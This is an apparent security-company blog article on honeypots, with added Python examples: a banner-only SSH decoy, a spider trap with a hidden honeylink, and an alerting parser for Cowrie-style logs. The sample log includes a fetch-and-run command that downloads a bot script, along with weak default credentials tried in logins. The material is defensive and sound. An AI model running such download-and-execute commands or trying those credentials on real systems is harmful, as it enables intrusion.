Penetration Test · Jan Kahmen · 7 min read

Honeypots in IT Security

The so-called honeypot is one of the most exciting concepts in the field of IT security. A honeypot is a decoy system designed to attract attackers deliberately, and thereby to keep them away from the sensitive data in the corporate network.


The Honey Trap: What is a Honeypot?

The honeypot is a popular way of luring (potential) attackers away from their real target. But what exactly is a honeypot?
It is essentially a decoy: a system that looks like a worthwhile target but holds nothing of value. Attackers who take the bait believe they have already reached their goal and spend their effort on the decoy rather than on production systems; at the same time, every interaction with it is recorded. Both effects improve IT security.
Important: unlike classic security products or intrusion detection systems, the aim is not merely to ward off attacks. Attackers are meant to "fall into the honey trap" so that their actions can be observed. IT experts can then analyse the attackers' tools and strategy.
This knowledge in turn feeds into vulnerability assessments and into detection rules for the production environment. For this to work, companies must deliberately isolate the honeypot server from the rest of the network.

Explanation of Terms

The term honeypot refers to a decoy target that distracts attackers from their real goal. The term does not originate in IT security: it is based on the idea that a bear is more likely to walk into a trap if a pot of honey has been placed in it.

Benefits and Advantages of Honeypots

The honeypot is an important measure in the field of IT security. With its help, the behaviour of attackers can be understood much better. The honeypot is therefore a complement to, not a replacement for, conventional security measures. It offers the following advantages:

  • Attack detection: a honeypot serves no legitimate users, so nobody has a reason to connect to it. Any activity on the server is therefore suspicious by definition and produces far fewer false positives than alerts from a production system. Internet background noise from mass scanners still shows up; the interesting part is what a client does after the first contact.
  • Resources: since these systems are not production systems, the need for resources is low.
  • Information: with a honeypot, experts collect information about attack attempts, for example the credentials tried, the tools uploaded and the commands executed. The knowledge gained can be used to prioritise vulnerability scanning and to write detection rules for the production network. Early sightings of scanning or botnet activity on a honeypot can also give warning of attacks such as DDoS before they reach production systems.

In False Security: The Disadvantages of Honeypots

However, honeypots also carry three major risks:

  • Companies sometimes neglect their actual security controls once a honeypot is in place. They lull themselves into a false sense of security and, for example, stop continuous vulnerability scanning. Key figures such as Mean Time to Detect (MTTD) are then also disregarded.
  • Sophisticated attackers may penetrate the production system anyway, or, if the honeypot is poorly isolated, use it as a stepping stone into the network. A well-rehearsed security incident response helps to get such a problem under control quickly.
  • If the honeypot is not convincingly genuine, attackers will recognise it as a decoy and can deliberately feed it misleading activity, leaving network administrators with false information.

Different Types of "Honey Traps"

Honeypots must react in much the same way as production systems, so that the attacker does not recognise the honey trap as such. One important criterion here is the degree of interaction.

High- vs. Low-interaction Honeypots

A high-interaction honeypot is not a simple simulation. It is a real system with real functionality, for example a complete operating system with services that an attacker can actually log in to. This makes it more complex to operate and requires close monitoring and strict network isolation. Otherwise, the attacker may succeed in hijacking the honey trap and then use the server for further attacks.
Low-interaction honeypots are different. They simulate individual functions or services, for example the banner and login prompt of a service, but are not a real system. They are much simpler and safer to run, but they capture less about what an attacker does after the first contact.
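The following is an added example of the low-interaction variant just described; it is not code from the original article or from any honeypot project. It listens on a TCP port, greets every client with an assumed SSH-style banner, never authenticates anything and records who connected and what they sent first. The probe clients and their payloads are constructed so the example runs offline on localhost.

```python
"""Low-interaction honeypot: presents a fake SSH banner, never authenticates,
and records who connected and what they sent first. Added example, not part
of the original article; the banner string is an assumed decoy value."""
import socket
import threading
import time
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class HoneypotEvent:
    src_ip: str
    src_port: int
    timestamp: float
    client_data: bytes   # first chunk the client sent, e.g. its own SSH banner


class LowInteractionHoneypot:
    """Listens on one TCP port and emulates nothing beyond the banner."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0,
                 banner: bytes = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n"):
        self.host, self.port, self.banner = host, port, banner
        self.events: List[HoneypotEvent] = []
        self._lock = threading.Lock()
        self._sock: Optional[socket.socket] = None

    def start(self) -> int:
        """Bind and listen; port 0 lets the OS pick a free one. Returns the port."""
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind((self.host, self.port))
        self._sock.listen(5)
        self.port = self._sock.getsockname()[1]
        return self.port

    def serve(self, max_connections: int) -> None:
        """Accept a fixed number of connections (bounded so the example terminates)."""
        for _ in range(max_connections):
            conn, (ip, port) = self._sock.accept()
            with conn:
                conn.settimeout(2.0)
                conn.sendall(self.banner)          # look like sshd...
                try:
                    data = conn.recv(256)          # ...but only record the reply
                except socket.timeout:
                    data = b""
            # Nothing is authenticated and no shell exists: the attacker gets
            # nowhere, but every contact is now evidence.
            with self._lock:
                self.events.append(HoneypotEvent(ip, port, time.time(), data))
        self._sock.close()


def probe(port: int, payload: bytes) -> bytes:
    """Plays the connecting client (scanner); returns the banner it saw."""
    with socket.create_connection(("127.0.0.1", port), timeout=2) as s:
        banner = s.recv(256)
        s.sendall(payload)
    return banner


def demo() -> List[HoneypotEvent]:
    """Run the honeypot against two constructed probes and return its event log."""
    hp = LowInteractionHoneypot()
    port = hp.start()
    t = threading.Thread(target=hp.serve, kwargs={"max_connections": 2}, daemon=True)
    t.start()
    probe(port, b"SSH-2.0-libssh_0.9.6\r\n")        # an SSH scanner identifying itself
    probe(port, b"GET / HTTP/1.0\r\n\r\n")           # a mis-aimed HTTP probe
    t.join(timeout=5)
    return hp.events


if __name__ == "__main__":
    for ev in demo():
        print(f"{ev.src_ip}:{ev.src_port} sent {ev.client_data!r}")
```

Because the decoy implements no protocol beyond the banner, there is nothing for an attacker to exploit on it, which is exactly the trade-off of the low-interaction type: it is safe to expose, but it learns little more than the address, timing and first bytes of each contact. In a real deployment the listener would run on an isolated host and ship its events to a log collector rather than keep them in memory.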

Different Threat Types

Attackers use a wide range of techniques against the corporate network; lists such as the OWASP Top 10 catalogue the most common ones. Ideally, the honeypot draws these attacks onto the non-production system. The use of honeypots has proven effective in the following cases:

  • Database mockups (decoy databases) help detect SQL injection and attempts to log in with stolen or guessed credentials.
  • Email traps (spamtraps) are addresses that are never used for real correspondence; anything sent to them is spam, which helps to protect regular inboxes.
  • Spider honeypots are pages reachable only through links that human visitors never see, so only web crawlers find them; clients that request them can be blocked.
  • Malware honeypots mimic software and APIs in order to capture and analyse malware.
  • Honeylinks are links that can only be found by analysing the HTML source, not in the rendered page; as soon as the link is called, comprehensive protective measures are triggered.
  • Tarpits deliberately slow down connections, which reduces the propagation speed of worms and hinders port scans.
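The spider honeypot and honeylink from the list above, combined in one added example (not code from the original article). The request handler is written as a pure function so it can be exercised offline; the trap path, the page markup and the three simulated clients are constructed assumptions, and the addresses come from documentation ranges.

```python
"""Spider trap with a honeylink, modelled as a pure request handler so it runs
offline. Added example, not part of the original article; the trap path, the
page content and the simulated clients are constructed assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

TRAP_PATH = "/internal/archive-2019/"   # hypothetical; never shown to humans

# A polite crawler reads this first and stays away from the trap.
ROBOTS_TXT = f"User-agent: *\nDisallow: {TRAP_PATH}\n"

# The honeylink exists only in the markup: it is hidden from the rendered page,
# so a human never clicks it, but a crawler parsing the HTML will follow it.
INDEX_HTML = f"""<html><body>
<h1>Welcome</h1>
<p>Public content.</p>
<a href="{TRAP_PATH}" style="display:none" aria-hidden="true" tabindex="-1">archive</a>
</body></html>
"""


@dataclass
class TrapState:
    flagged: Dict[str, int] = field(default_factory=dict)   # client_ip -> hits
    log: List[dict] = field(default_factory=list)


def handle_request(path: str, client_ip: str, user_agent: str,
                   state: TrapState) -> Tuple[int, str]:
    """Returns (status, body). Whoever requests the trap path is flagged,
    and every later request from that address is refused."""
    if client_ip in state.flagged:
        state.flagged[client_ip] += 1
        return 403, "Forbidden"
    if path == "/robots.txt":
        return 200, ROBOTS_TXT
    if path.startswith(TRAP_PATH.rstrip("/")):
        # No legitimate visitor can arrive here: the link is invisible and the
        # path is disallowed for crawlers, so this request is a misbehaving bot.
        state.flagged[client_ip] = 1
        state.log.append({"ip": client_ip, "ua": user_agent, "path": path})
        # Serve something bland rather than an error, so the bot is not tipped off.
        return 200, "<html><body><p>Archive is empty.</p></body></html>"
    if path == "/":
        return 200, INDEX_HTML
    return 404, "Not found"


def simulate() -> Tuple[TrapState, Dict[str, List[int]]]:
    """Three constructed clients; returns the trap state and each client's status codes."""
    state = TrapState()
    clients = {
        # human: loads the page, never sees the hidden link
        "203.0.113.10": ("Mozilla/5.0", ["/", "/about"]),
        # well-behaved crawler: honours robots.txt, skips the trap
        "198.51.100.5": ("GoodBot/1.0", ["/robots.txt", "/"]),
        # scraper: ignores robots.txt, follows every href, then keeps going
        "192.0.2.77": ("curl/8.0", ["/", TRAP_PATH, "/about", "/"]),
    }
    statuses: Dict[str, List[int]] = {}
    for ip, (ua, paths) in clients.items():
        statuses[ip] = [handle_request(p, ip, ua, state)[0] for p in paths]
    return state, statuses


if __name__ == "__main__":
    state, statuses = simulate()
    print("flagged:", state.flagged)
    print("statuses:", statuses)
```

The scraper is the only client that ever reaches the trap, and from that moment on it is served 403 while the human and the polite crawler are unaffected. In production the flag should expire after a while and be keyed on more than the source address, since many users share addresses behind NAT and a single flagged proxy would otherwise lock out everyone behind it.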

Implement Honeypots Successfully - In 4 Steps

A honeypot for IT security can be set up quickly, but it requires good planning. Four steps are necessary before it can distract attackers from their real target.

Step 1: Select a Server

Setting up a honeypot requires a server. Since the honey trap needs few resources, low-powered hardware or a small virtual machine is sufficient. Whether physical or virtual, it is essential that the honeypot remains isolated from the rest of the network, so that a compromised honeypot cannot be used as a bridgehead into production systems.

Step 2: Install Honeypot Software

Choose and install honeypot software that matches the intended concept (see the options below). As with pentests, the use of honeypots requires sufficient planning and a sound concept. Detailed documentation, as is standard in security assessments, is just as useful when operating honeypots.

Step 3: Configuration

A well-thought-out configuration is essential for a honeypot to succeed. The easiest way to achieve this is with the help of a security expert, such as Turingpoint. The honeypot should also not be too easy to access: a server that accepts any password or runs an obviously outdated service on an otherwise empty host is a giveaway, and attackers could become suspicious.

Step 4: Testing

To test the honeypot, companies slip into the role of the attacker themselves; a bug bounty programme or a contracted ethical hacker is an alternative. Once there has been a minimum amount of activity in the honeypot, it is essential to monitor and analyse the server logs and to confirm that alerts actually reach the security team.

Honeypot Software: 3 Options at a Glance

There are different types of honeypot software that can be used in everyday business, as the following examples show. Among the most popular variants are:

  • T-Pot: an all-in-one multi-honeypot platform that bundles numerous honeypots in containers, with excellent visualisation of the collected data.
  • Honeytrap: an extensible open-source framework that helps organisations run, monitor and manage honeypots. It offers extensive configuration options and provides numerous agents.
  • Cowrie: an SSH and Telnet honeypot that logs brute-force attacks and, in its medium-interaction mode, the shell commands an attacker executes after logging in. This allows dedicated observation of attacker behaviour.
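The "attack detection" and "information" benefits described earlier only materialise if someone turns the honeypot's logs into alerts and statistics. The following added example (not Cowrie's own code and not from the original article) does that for Cowrie-style JSON logs: it parses one event per line, builds a per-source summary of login attempts, credentials tried and commands executed, and raises alerts. The sample lines are constructed for this example using the event names and field names Cowrie writes (`eventid`, `src_ip`, `session`, `username`, `password`, `input`); the addresses are documentation ranges and the download URL in the command is invented.

```python
"""Detection logic over honeypot logs. Added example, not Cowrie's own code:
the sample lines below are constructed, using the JSON event names and fields
Cowrie writes (eventid, src_ip, session, username, password, input), and the
IP addresses are documentation ranges."""
import json
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51234,"dst_port":2222,"protocol":"ssh","session":"a1b2c3","timestamp":"2024-05-01T10:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:01.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:02.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:03.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:04.000000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:05.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:06.000000Z"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:07.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://198.51.100.9/bot.sh -O /tmp/.x; sh /tmp/.x","src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:08.000000Z"}
{"eventid":"cowrie.session.closed","duration":42.5,"src_ip":"203.0.113.7","session":"a1b2c3","timestamp":"2024-05-01T10:00:42.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","src_port":40001,"dst_port":2222,"protocol":"ssh","session":"d4e5f6","timestamp":"2024-05-01T10:05:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","src_ip":"198.51.100.23","session":"d4e5f6","timestamp":"2024-05-01T10:05:01.000000Z"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","src_ip":"198.51.100.23","session":"d4e5f6","timestamp":"2024-05-01T10:05:02.000000Z"}
{"eventid":"cowrie.session.closed","duration":3.1,"src_ip":"198.51.100.23","session":"d4e5f6","timestamp":"2024-05-01T10:05:03.000000Z"}
"""


def parse_events(text: str) -> List[dict]:
    """One JSON object per line; blank or malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarize(events: List[dict]) -> Dict[str, dict]:
    """Per source address: sessions, login outcomes, credentials tried, commands run."""
    per_ip: Dict[str, dict] = defaultdict(lambda: {
        "sessions": set(), "failed": 0, "success": 0,
        "credentials": Counter(), "commands": []})
    for ev in events:
        ip = ev.get("src_ip")
        if not ip:
            continue
        s = per_ip[ip]
        s["sessions"].add(ev.get("session"))
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["credentials"][(ev.get("username"), ev.get("password"))] += 1
            s["failed" if eid.endswith("failed") else "success"] += 1
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
    return dict(per_ip)


def alerts(summary: Dict[str, dict], max_failures: int = 3) -> List[Tuple[str, str]]:
    """Turn the summary into alert lines. On a honeypot any successful login is an
    alert (there are no legitimate users); the failure threshold only filters the
    background noise of one-off scanners."""
    out = []
    for ip, s in sorted(summary.items()):
        reasons = []
        if s["failed"] >= max_failures:
            reasons.append(f"{s['failed']} failed logins (brute force)")
        if s["success"]:
            reasons.append("successful login on a system with no legitimate users")
        if s["commands"]:
            reasons.append(f"{len(s['commands'])} commands executed, first: {s['commands'][0]!r}")
        if reasons:
            out.append((ip, "; ".join(reasons)))
    return out


def top_credentials(summary: Dict[str, dict], n: int = 3) -> List[Tuple[Tuple[str, str], int]]:
    """Which username/password pairs attackers try most: input for password policy."""
    total: Counter = Counter()
    for s in summary.values():
        total.update(s["credentials"])
    return total.most_common(n)


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_LOG))
    for ip, reason in alerts(summary):
        print(f"ALERT {ip}: {reason}")
    print("most tried credentials:", top_credentials(summary))
```

With the constructed log, only 203.0.113.7 produces an alert at the default threshold (four failures, a success, three commands including a download-and-execute), while the two-attempt scanner from 198.51.100.23 is kept as statistics but not alerted on; lowering `max_failures` to 2 alerts on both. The commands and the credential list are the "information" the article refers to: the first tells you what an intruder does after landing, the second which weak passwords your own systems must not accept.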

Contact

Curious? Convinced? Interested?

Schedule a no-obligation initial consultation with one of our sales representatives. Use the following link to select an appointment: